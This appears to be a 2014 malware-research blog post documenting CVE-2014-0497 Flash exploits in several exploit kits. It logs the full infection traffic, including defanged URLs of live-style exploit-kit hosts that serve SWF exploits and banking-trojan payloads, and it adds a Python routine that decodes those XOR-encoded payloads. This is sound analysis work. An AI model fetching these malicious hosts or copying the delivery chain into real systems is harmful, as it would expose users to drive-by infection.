2014-02-27 - Exploit Integration

CVE-2014-0497 (Flash) integrating Exploit Kits

And here we are: the first CVE-2014-xxxx exploited in a blind mass attack. (I was expecting the 0322, but maybe it is not that easy to implement.)

As spotted by EKWatcher, Angler EK is introducing today a new Flash exploit, identified as CVE-2014-0497 by Timo Hirvonen from F-Secure. Kaspersky found this vulnerability exploited in targeted attacks; it was patched 22 days ago.

That exploit is more efficient than those previously found.

The samples covered by Microsoft and Kaspersky were not working properly on Flash 12.x,
but it looks like the coder of this exploit found a way to bypass the mitigation preventing execution on the 12.x branch.

Angler EK : 2014-02-26

CVE-2014-0497 successful pass in Angler EK from the ru8080 team: 2014-02-26
(note: the logo and name for Angler are not "official" ones)

GET http://phisoomythyxiboow .ru:8080/nf21cea1mg
200 OK (text/html)

Part of the landing after deobfuscation work (credits again to EKWatcher),
giving hints on which CVE to expect.
GET http://phisoomythyxiboow .ru:8080/7Iw-u6QdLxfxRCoG1KQb6ObHh9cNwPcXhm4XQ5P4hK8INIZ4
200 OK (text/html)  2a2136743be5be61b4e929b62a7a06ea CVE-2014-0497

Flash exploit opened in FFDec.
Piece of code showing calls that do not look really "Anglerish".
Remains of debugging?

GET http://phisoomythyxiboow .ru:8080/EVUjxyPGW5p_MsLcWq12Y5HwY0gkVHSUamvyuIIBd4efHGTf
200 OK (application/octet-stream) Once decoded : 664e4383fcfe183edc04247f4d018e11 (GameOver Zeus )

Side notes :

 - It's not just a XOR-ed payload. As Bryan Burns figured out, one byte is modified,
so a XOR pass is not enough to get the actual payload.
It seems the modified data is always the SizeOfOptionalHeader field (which sits at e_lfanew + 0x14, so its file offset depends on the length of the DOS stub)
(sample opened in PE Insider)
<edit2 2014-03-05> @malc0de told me that for the IE payload the byte flip is at 0x104 instead of 0x94 </edit2>

I have no plan to search for the piece of code in charge of the modification. If you happen to work on it, I would be happy to hear about it.

 - This CVE is not being served for now in "Reveton" Angler EK instances, despite the landing showing the upgrade.
Same VM, a few minutes between the two passes.
Guess who is the VIP....
Edit1: 2014-02-27
It's now in Angler EK from the Reveton team too.
CVE-2014-0497 in Reveton Angler EK

Files: Fiddler/sample (Owncloud via goo.gl)
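The side note above describes the payload encoding as a XOR pass plus one clobbered byte in the SizeOfOptionalHeader field, and the two quoted offsets (0x94 and 0x104) are exactly what e_lfanew + 0x14 gives for e_lfanew = 0x80 and e_lfanew = 0xF0. The Python below is an added example written for this page; it is not Angler's code nor the author's tooling. It assumes a single-byte XOR key recovered from the "MZ" known plaintext (the post does not state the key length), locates the field through e_lfanew instead of a fixed offset, and rewrites it from the optional header Magic (0xE0 for PE32, 0xF0 for PE32+). The minimal PE skeleton and the `encode_like_the_post` transform are constructed for the demonstration and only mimic the described behaviour.

```python
import struct

# IMAGE_OPTIONAL_HEADER.Magic -> SizeOfOptionalHeader for a full header (16 data directories)
OPTIONAL_HEADER_SIZE = {0x10B: 0xE0, 0x20B: 0xF0}   # PE32, PE32+


def recover_xor_key(blob):
    """Recover a single-byte XOR key from the 'MZ' signature (known plaintext).

    A single-byte key is an assumption made for this example; the post does not
    describe the key length Angler uses.
    """
    key = blob[0] ^ 0x4D                       # 'M'
    if blob[1] ^ key != 0x5A:                  # 'Z'
        raise ValueError("first two bytes do not decode to 'MZ' under a single-byte key")
    return key


def xor_decode(blob, key):
    return bytes(b ^ key for b in blob)


def size_of_optional_header_offset(pe):
    """File offset of IMAGE_FILE_HEADER.SizeOfOptionalHeader.

    Layout: e_lfanew -> 'PE\\0\\0' (4 bytes), then the 20-byte file header whose
    SizeOfOptionalHeader sits at offset 16, i.e. e_lfanew + 20 overall.
    """
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=%#x" % e_lfanew)
    return e_lfanew + 20


def repair_size_of_optional_header(pe):
    """Rewrite SizeOfOptionalHeader from the optional header Magic.

    Returns (fixed_image, field_offset, value_found, value_written).
    """
    off = size_of_optional_header_offset(pe)
    found = struct.unpack_from("<H", pe, off)[0]
    # The optional header starts right after the file header, so Magic is 4 bytes past the field.
    magic = struct.unpack_from("<H", pe, off + 4)[0]
    expected = OPTIONAL_HEADER_SIZE.get(magic)
    if expected is None:
        raise ValueError("unknown optional header magic %#x" % magic)
    fixed = bytearray(pe)
    struct.pack_into("<H", fixed, off, expected)
    return bytes(fixed), off, found, expected


def decode_payload(blob):
    """XOR pass, then repair the one clobbered field; returns the repair tuple."""
    key = recover_xor_key(blob)
    return repair_size_of_optional_header(xor_decode(blob, key))


# --- constructed sample (not a real dropped binary) ---------------------------
def build_minimal_pe32(e_lfanew=0x80):
    """Constructed skeleton: DOS header, PE signature, file header, zeroed PE32 optional header."""
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=i386, 1 section, no symbols, SizeOfOptionalHeader=0xE0, EXECUTABLE|32BIT
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt_hdr = struct.pack("<H", 0x10B) + bytes(0xE0 - 2)
    return bytes(dos) + b"PE\0\0" + file_hdr + opt_hdr


def encode_like_the_post(pe, key=0x5A, bogus=0x1234):
    """Mimic the described transform: clobber SizeOfOptionalHeader, then XOR (constructed, not Angler's code)."""
    buf = bytearray(pe)
    struct.pack_into("<H", buf, size_of_optional_header_offset(pe), bogus)
    return xor_decode(bytes(buf), key)


if __name__ == "__main__":
    clean = build_minimal_pe32()
    fixed, off, found, written = decode_payload(encode_like_the_post(clean))
    print("field at %#x: found %#x, rewrote %#x, image restored: %s" % (off, found, written, fixed == clean))
```

Locating the field through e_lfanew rather than hard-coding 0x94 is what makes the same routine cover the IE payload case mentioned in edit2: a DOS stub ending at 0xF0 moves the field to 0x104 without any change to the decoder.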

Nuclear Pack : 2014-04-02

Thanks to Symantec for help with confirmation.

Nuclear Pack CVE-2014-0497 Successful pass

GET http://3d0ok0ay36113q97-7.canfut .ru/
200 OK (text/html) 

Nuclear Pack landing.
The random background color is part of the obfuscation.
Appeared around 2014-02-24.
The js after beautify: http://pastebin.com/8SqrGU3s

Small illustration of how the bgcolor is being used

The js after deobfuscation: http://pastebin.com/dyckC40T

Here is the part we want to see:
the Flash check (which in itself gives a good indication of the bullet that might be shot)

GET http://1785839722-7.canfut .ru/1396402140.htm
200 OK (text/html)  <- CVE-2013-2551 (IE)

GET http://1785839722-7.canfut .ru/1396402140.swf
200 OK (application/x-shockwave-flash) 26e9cf4bf96d08f3c76038f80de9a14f

SWF with a lot of meaningful function names

GET http://1785839722-7.canfut .ru/f/1396402140/7
200 OK (application/octet-stream)  f6a019b1afffc51ca34c99c19fc6d350 (GameOver Zeus) Microsoft name : Win32/Peaac

Files: Fiddler / Sample / Swf (OwnCloud)

Fiesta :
Not long after the CVE-2014-0322 integration, CVE-2014-0497 is now in Fiesta, as spotted by Brad here.
Thanks to Arseny Levin from Trustwave Labs and to Symantec for confirmation.

CVE-2014-0497 successful pass in Fiesta
GET http://cdryme.in .ua/xctl5j6/?2
200 OK (text/html) http://pastebin.com/CGP6RhDV (beautified)

Landing after "Beautify" and adding deobfuscation comments

GET http://cdryme.in .ua/xctl5j6/?21e9da56a4a8f02341460302565a060f010150025003050d0702510a07020001;120000;38
200 OK (application/x-shockwave-flash)  CVE-2014-0497 eb343c450abd625d2119b98dcc0d62d7

Piece of CVE-2014-0497 from Fiesta

GET http://cdryme.in .ua/xctl5j6/?0c0d9b4aab02c58a59065c5f0b5907580353055f0d00045a055004575a010156
200 OK (text/html)  CVE-2013-2551

GET http://cdryme.in .ua/xctl5j6/?7b29a0345fb0c67054125902530b000d045207025552030f0251060a02530603;6
200 OK (application/octet-stream) Encoded payload is: Miuref fe0ffd0bbfaec31450d82c1b38ad0ffe

GET http://cdryme.in .ua/xctl5j6/?7b29a0345fb0c67054125902530b000d045207025552030f0251060a02530603;6;1
200 OK (text/html) Call Back.

Files : Fiddler/Flash/Payload (OwnCloud )

FlashPack: 2014-04-13

CVE-2014-0497 successful pass in the "Windigo gang" Flash Pack slot, 2014-04-16
(the monk image is the vendor's avatar on a forum; he names it Flash EK; it's a grandson of CritX Pack)
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/allow.php
200 OK (text/html)

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/js/pd.php?id=67636c6c31326e6f6e37796e6b78316674367967757a773931353935336231616131343938363336643839376234393435353930356164362e676563656b6979616665746c6572692e67656e2e7472
200 OK (text/html)

POST http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/json.php
200 OK (text/html)

Bullets chosen after the plugin detect: CVE-2013-2551 & CVE-2014-0497

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/msie.php
200 OK (text/html) CVE-2013-2551

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/flash2014.php
200 OK (text/html)

Call for exploit

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/include/64a2f.swf
200 OK (application/x-shockwave-flash) ec80266e7b2f29232e25c6f0459ede6e CVE-2014-0497

Déjà vu ?  Yes. Nuclear Pack.

It seems there are traces of CVE-2013-0634, but that exploit is not called that way in Flash Pack.
It's now flash2013.php > loadfla20013.php and another SWF.

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/loadfla20014.php
200 OK (application/octet-stream) d271fcae3a8c1b345e3afdc45af9188d No surprise here for this gang: Glupteba

(you may want to read the stellar paper by ESET on Operation Windigo; this Flash EK instance is what you get these days after a Cdorked-compromised server and a few redirects)

Files : FlashEK_CVE-2014-0497_140416.zip (OwnCloud via Goo.gl)

Sweet Orange :
I heard of it from Sebastien Duquette from ESET on April 16th and got it working with a Windows 7 VM.
The exploit is not being pushed to Windows XP.


GET http://raserkl15.ham .cx:9290/pda/family.php?space=282

200 OK (text/html)

GET http://raserkl15.ham .cx:9290/pda/ZgaGWW
200 OK (application/x-shockwave-flash)

CVE-2014-0497 in Sweet Orange (SWT) 2014-04-16
The implementation is exactly the same as the one seen in Nuclear.

GET http://raserkl23.ham .cx:9290/action.php?ports=665&data=476&bios=4&howto=446&sports=171&lang=266&stats=765&feed=420&email=431
200 OK (application/octet-stream)

Fiddler: Here
You'll find a pcap in this post from 2014-04-20 from Malware-Traffic-Analysis.

Read more:
CVE-2014-0497 – a 0-day vulnerability - Vyacheslav Zakorzhevsky - Kaspersky - 2014-02-05
A journey to CVE-2014-0497 exploit - Chun Feng - MMPC - 2014-02-17